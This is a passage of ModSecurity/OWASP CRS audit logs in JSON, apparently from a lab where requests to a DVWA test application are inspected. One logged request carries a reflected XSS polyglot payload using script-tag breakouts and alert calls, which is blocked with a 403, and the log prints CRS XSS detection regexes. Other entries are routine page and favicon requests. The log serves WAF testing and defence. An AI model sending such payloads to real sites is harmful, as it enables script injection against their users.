\"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":585,"p2":3331,"p3":0,"p4":0,"p5":150,"sr":24,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:23 --0400","transaction_id":"WRc0n38AAQEAAAkW4RwAAAAB","remote_address":"127.0.0.1","remote_port":42066,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:26:00 GMT","If-None-Match":"\"1a8-54f6a470f3057\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:30:21 GMT","ETag":"\"1d0-54f6a5695262a\"","Accept-Ranges":"bytes","Content-Length":"464","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc0n38AAQEAAAkW4RwAAAAB\"]"],"stopwatch":{"p1":398,"p2":1073,"p3":72,"p4":149,"p5":52,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:23 --0400","transaction_id":"WRc0n38AAQEAAAkW4R0AAAAB","remote_address":"127.0.0.1","remote_port":42066,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc0n38AAQEAAAkW4R0AAAAB\"]"],"stopwatch":{"p1":476,"p2":857,"p3":45,"p4":381,"p5":53,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:23 --0400","transaction_id":"WRc0n38AAQEAAAkW4R4AAAAB","remote_address":"127.0.0.1","remote_port":42066,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc0n38AAQEAAAkW4R4AAAAB\"]"],"stopwatch":{"p1":719,"p2":1197,"p3":47,"p4":247,"p5":52,"sr":104,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:45 --0400","transaction_id":"WRc08X8AAQEAAAkYuE8AAAAD","remote_address":"192.168.75.145","remote_port":56790,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1463","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli_blind/\"] [unique_id \"WRc08X8AAQEAAAkYuE8AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":396,"p2":2261,"p3":105,"p4":538,"p5":135,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:45 --0400","transaction_id":"WRc08X8AAQEAAAkZ0BMAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1463","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli_blind/\"] [unique_id \"WRc08X8AAQEAAAkZ0BMAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":611,"p2":2509,"p3":98,"p4":481,"p5":74,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:46 --0400","transaction_id":"WRc08n8AAQEAAAkZ0BQAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli_blind/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc08n8AAQEAAAkZ0BQAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":632,"p2":2175,"p3":98,"p4":396,"p5":65,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:46 --0400","transaction_id":"WRc08n8AAQEAAAkZ0BUAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli_blind/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id 